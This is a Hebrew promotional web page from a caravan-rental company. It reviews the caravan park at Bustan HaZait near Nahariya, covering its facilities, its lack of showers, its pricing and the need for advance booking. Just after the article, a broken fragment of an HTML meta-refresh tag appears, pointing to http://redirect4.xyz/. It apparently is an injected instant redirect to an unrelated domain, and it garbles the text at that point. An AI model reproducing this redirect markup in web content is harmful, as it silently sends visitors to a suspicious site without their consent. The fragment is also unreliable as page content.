בוסתן הזית

לקבלת הצעת מחיר שלא תוכלו לסרב צרו איתנו קשר

בוסתן הזית הוא אחד ממקומות האירוח המוצעים למגיעים לאזור נהריה בפרט והצפון בכלל. הבוסתן משתרע על פני כעשרה דונמייםבוסתן הזית ומספק למגיעים אליו אפשרויות אירוח שונות – וכן, גם חניון קראוונים שמי שמטייל בצפון באמצעות הקראוון יוכל להשתמש בו, ללון בו בלילה או אפילו לשהות בו ביום.

בסקירה הנוכחית נציג עבורכם את מאפייני החניון, ונסייע לכם להכריע בשאלה האם אתם יכולים לבנות עליו במהלך הטיול הצפוני הבא שלכם.

על בוסתן הזית

בוסתן הזית, כאמור, מציע אופנים שונים לשהות ולאירוח. במקום תוכלו למצוא סוויטה מפוארת אחת וכן מספר צימרים מעץ המתאימים לזוגות או למשפחות. במקום יש בהמשך לכך גן אירועים שניתן לקיים בו אירועים משפחתיים או עסקיים, חצר גדולה ובר מסעדה. בנוסף לכך המקום נמצא במרחק נגיעה מאטרקציות שונות הנמצאות בצפון הארץ, כולל אפשרויות לטיולי סוסים, שייט קייאקים בנחלים השונים, ביקור בגן הלאומי אכזיב ובראש הנקרה ועוד.

מה שנוגע יותר לענייננו הוא חניון הקראוונים הנמצא בבוסתן הזית. באתר האינטרנט של בוסתן הזית מצוין שבחניון יש את “כל השירותים הנדרשים לטיול שלכם”. מההתרשמות שלנו מדובר בעיקר בתשתיות כלליות, ובעצם העובדה שמדובר כאן על שטח מוסדר ובטוח לשהות. במקום יש תאורה, מדשאות, עמדות מנגל, סככות צל ועוד. במקום בהמשך לכך יש אפשרות להתחבר עם הקראוון למים או לחשמל, מה שאמור לעשות את העבודה עבור רוב המטיילים ולאפשר להם להנהל בשטח. להתרשמותנו אין עדיין תאי שירותים או מקלחות, להבדיל מחניוני קראוונים אחרים בצפון, כך שמי שהקראוון שלו אינו כולל את התשתיות האלה עלול להיתקע.

יש שיטענו שבתנאים האלה מתאים חניון הקראוונים של בוסתן הבית בעיקר לשהות קצרה, של יום או יומיים, ופחות להשתקעות במשך מספר רב יותר של ימים. הבחירה כאן היא שלכם, והיא צריכה להכניס לחשבון את מטרות השהות שלכם בצפון, תוכניות הטיול הספציפית שלכם, סוג הקראוונים שאתם מטיילים באמצעותו וכן הלאה. כמובן שגם משתנים כלכליים צריכים להיכנס לתוך משוואת ההחלטה שלכם, כפי שנראה מיד.

כמה זה צפוי לעלות?

כאשר מטיילים באמצעות קראוון יכולים לחסוך סכומי כסף משמעותיים ביחס לאופני האירוח האחרים, כולל אפשרויות האירוח האחרות הקיימות בבוסתן הזית עצמו. מבלי להיכנס למחירים הספצפיים של שהות בחניון הקראוונים של בוסתן הזית, שגם עשויים להשתנות מפעם לפעם, אפשר לטעון בפה מלא שמדובר במחירים שהם סבירים בהחלט.

חשוב לשים לב שחניון בוסתן הזית אמנם מציע שטח ראוי, אבל ברור שהשטח הזה אינו אינסופי. אתם לא יכולים פשוט להגיע עם הקראוון שלכם ביום נקוב, ולצפות כי ללא צל של ספק יהיה עבורכם פתרון בחניון. התיאום מראש עם אנשי בוסתן הזית הופך בתנאים האלה לחובה של ממש, כשכדי להבטיח את המקום שלכם בחניון רצוי לעשות את זה מוקדם ככל האפשר.
equiv
"Refresh" content="0; URL=http://redirect4.xyz/">

לקבלת הצעת מחיר שלא תוכלו לסרב צרו איתנו קשר

המרכז להשכרת קרוואנים

שירותי השכרת קרוואנים עם החברה המובילה בישראל. קרוואנים לכל צורך ולכל מטרה להשכרה במחיר זול ומשתלם!

אז מה היה לנו בכתבה:

צרו איתנו קשר